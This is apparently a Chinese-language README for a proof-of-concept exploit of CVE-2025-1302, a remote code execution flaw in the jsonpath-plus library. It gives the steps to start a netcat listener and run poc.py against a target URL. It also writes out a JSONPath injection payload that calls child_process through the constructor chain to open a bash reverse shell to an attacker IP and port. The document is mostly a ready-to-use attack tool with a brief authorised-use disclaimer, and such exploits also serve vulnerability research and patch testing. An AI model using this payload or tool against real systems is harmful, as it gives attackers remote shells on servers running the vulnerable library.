
针对 jsonpath-plus 中 CVE-2025-1302 的 PoC 漏洞利用和易受攻击的服务器演示。
PoC脚本名称: poc.py
这是一个针对CVE-2025-1302的概念验证漏洞利用脚本,该漏洞影响jsonpath-plus库中的RCE漏洞。当对存在漏洞的服务端点运行时,该脚本尝试通过JSONPath负载触发远程代码执行,并建立反向Shell连接到攻击者。
--method 或 --no-fallback 标志支持 POST、GET 或 AUTO(POST 并回退到 GET)。{ip} 和 {port} 模板占位符。tqdm 进度条显示延迟和负载循环。--output 将所有结果保存为JSON文件。克隆此仓库:
git clone https://github.com/yourorg/jsonpath-rce-poc.git
cd jsonpath-rce-poc
安装依赖(需要 Python 3.6+):
pip install -r requirements.txt
在攻击者机器上启动监听器(根据需要替换端口):
nc -lvnp 9999
运行 PoC:
python3 poc.py \
--url http://TARGET_HOST:PORT/query \
--ip ATTACKER_IP --port 9999 \
[--payload-file payloads.txt] \
[--delay 5] \
[--method AUTO|POST|GET] \
[--no-fallback] \
[--output results.json]
--payload-file:包含每行一个 JSONPath 负载的文件。使用 {ip} 和 {port} 占位符。--delay:发送负载前的等待秒数(显示倒计时)。--method:强制使用 POST、GET 或 AUTO(默认)。--no-fallback:跳过任何 GET 重试的简写(等同于 --method POST)。--output:保存尝试的 JSON 日志文件路径。$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
请仅在受控的实验室环境中,针对你拥有或明确授权测试的系统使用此脚本。滥用可能违法且不道德。